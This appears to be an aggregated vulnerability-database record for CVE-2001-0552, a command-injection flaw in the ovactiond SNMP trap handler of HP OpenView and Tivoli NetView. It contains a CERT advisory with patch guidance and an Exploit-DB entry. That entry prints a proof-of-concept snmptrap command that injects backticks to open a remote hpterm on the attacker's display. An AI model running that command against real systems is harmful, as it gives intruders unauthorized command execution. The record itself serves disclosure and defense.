ID CVE-2001-0552 Type cve Reporter NVD Modified 2016-10-17T22:11:30
Description
ovactiond in HP OpenView Network Node Manager (NNM) 6.1 and Tivoli Netview 5.x and 6.x allows remote attackers to execute arbitrary commands via shell metacharacters in a certain SNMP trap message.
{"cert": [{"lastseen": "2018-08-31T02:38:07", "references": ["http://www.cert.org/advisories/CA-2001-24.html", "http://www.securityfocus.com/bid/2845", "http://www.openview.hp.com/", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CAN-2001-0552", "http://www.tivoli.com/products/index/netview/", "http://www.tivoli.com/support/ ", "http://www.tivoli.com/support/", "http://www.tivoli.com/support/", "http://us-support.external.hp.com/cki/bin/doc.pl/screen=ckiDisplayDocument?docId=200000055277985 "], "description": "### Overview\n\nHewlett Packard's (HP) OpenView and Tivoli NetView are system management software packages. There is a vulnerability a component of these packages, ovactiond, that allows intruders to execute arbitrary commands as user bin. This may subsequently lead to a root compromise. \n\n### Description\n\nHP [OpenView](<http://www.openview.hp.com/>) and Tivoli [NetView](<http://www.tivoli.com/products/index/netview/>) are set of tools to manage large networks. Part of OpenView and NetView is a daemon called ovactiond, which is the SNMP trap and event handler. It is possible for an intruder to execute arbitrary commands by sending a malicious message to a vulnerable version of ovactiond. These commands run with the privileges of the ovactiond process, typically bin on Unix systems, and SYSTEM on Windows NT/2000. Often it is possible to use this access to gain root access on Unix systems. An exploit is publicly available. Note that Tivoli NetView is not vulnerable via the default configuration, however, it is likely that customized configurations are vulnerable HP is vulnerable by the default configuration. \n\nFor more information, see HP Security Bulletin HPSBUX0106-154 and <http://www.tivoli.com/support/>. \n \nIt has been confirmed with HP that the patch referenced on Security Focus for OpenView Version 5.01 is only for Version 6.1. \n \n--- \n \n### Impact\n\nAn intruder can execute arbitrary commands with the privileges of the ovactiond process, typically bin on Unix systems, and SYSTEM on Window NT/2000 systems. \n \n--- \n \n### Solution\n\nApply patches from your vendor as appropriate. HP has released HP Security Bulletin HPSBUX0106-154. Tivoli has information posted on <http://www.tivoli.com/support/>. \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nCompaq Computer Corporation| | 21 Jun 2001| 15 Aug 2001 \nHewlett Packard| | 15 Jun 2001| 24 Aug 2001 \nIBM| | 21 Jun 2001| 15 Aug 2001 \nMicrosoft| | 15 Jun 2001| 15 Aug 2001 \nSun| | 15 Jun 2001| 15 Aug 2001 \nTivoli| | 27 Jun 2001| 15 Aug 2001 \nApple| | 21 Jun 2001| 15 Aug 2001 \nComputer Associates| | 07 Aug 2001| 15 Aug 2001 \nFreeBSD| | 21 Jun 2001| 15 Aug 2001 \nFujitsu| | 21 Jun 2001| 15 Aug 2001 \nBSDI| | 21 Jun 2001| 15 Aug 2001 \nCaldera| | 21 Jun 2001| 15 Aug 2001 \nDebian| | 21 Jun 2001| 15 Aug 2001 \nDg| | 21 Jun 2001| 15 Aug 2001 \nNEC| | 21 Jun 2001| 15 Aug 2001 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23952171 Vendor Status Inquiry>). \n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://us-support.external.hp.com/cki/bin/doc.pl/screen=ckiDisplayDocument?docId=200000055277985>\n * <http://www.tivoli.com/support/>\n * <http://www.securityfocus.com/bid/2845>\n\n### Credit\n\nOur thanks to Milo G. van der Zee, who reported this problem to us and to Hewlett-Packard for the information contained in their advisory. \n\nThis document was written by Jason Rafail.\n\n### Other Information\n\n * CVE IDs: [CAN-2001-0552](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CAN-2001-0552>)\n * CERT Advisory: [CA-2001-24](<http://www.cert.org/advisories/CA-2001-24.html>)\n * Date Public: 08 Jun 2001\n * Date First Published: 21 Jun 2001\n * Date Last Updated: 06 Sep 2001\n * Severity Metric: 44.89\n * Document Revision: 18\n\n", "edition": 3, "reporter": "CERT", "published": "2001-06-21T00:00:00", "title": "Hewlett Packard OpenView and Tivoli NetView do not adequately validate SNMP trap arguments", "type": "cert", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "info", "cvelist": ["CVE-2001-0552", "CVE-2001-0552"], "modified": "2001-09-06T00:00:00", "id": "VU:952171", "href": "https://www.kb.cert.org/vuls/id/952171", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T15:15:55", "osvdbidlist": ["11341"], "references": [], "edition": 1, "description": "IBM Tivoli NetView 5/6 OVActionD SNMPNotify Command Execution Vulnerability. CVE-2001-0552. Remote exploits for multiple platform", "reporter": "Milo van der Zee", "published": "2001-06-08T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "IBM Tivoli NetView 5/6 OVActionD SNMPNotify Command Execution Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2001-0552"], "modified": "2001-06-08T00:00:00", "id": "EDB-ID:20909", "href": "https://www.exploit-db.com/exploits/20909/", "sourceData": "source: http://www.securityfocus.com/bid/2845/info\r\n\r\novactiond is part of the system management software packages OpenView and Netview, distributed by HP and IBM. It is designed for use on enterprise systems, and offers remote administrative facilities.\r\n\r\nA problem with the software makes it possible for a remote user to execute commands on a managed system with the privileges of the ovactiond process (often 'bin' on Unix systems). The default configuration of the daemon as installed with HP OpenView enables the execution of commands upon receiving a trap with the command encapsulated in quotes and escapes. Tivoli Netview is not vulnerable to this by default, but may be if customized.\r\n\r\nsnmptrap -v 1 <NNM host> .1.3.6.1.4.1.11.2.17.1 1.2.3.4 6 60000208 0 1 s \"\" 2 s \"\" 3 s \"\\`/usr/bin/X11/hpterm -display <your client display>\\`\" 4 s \"\" [snip...] 12 s \"\" ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/20909/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:06", "references": [], "edition": 1, "description": "# No description provided by the source\n\n## References:\nKeyword: Network Node Manager\nISS X-Force ID: 6683\n[CVE-2001-0552](https://vulners.com/cve/CVE-2001-0552)\nCERT VU: 952171\nCERT: CA-2001-24\nBugtraq ID: 2845\n", "reporter": "OSVDB", "published": "2001-06-08T00:00:00", "title": "HP OpenView NNM/Tivoli NetView ovactiond Arbitrary Command Execution", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2001-0552"], "modified": "2001-06-08T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:11341", "id": "OSVDB:11341", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
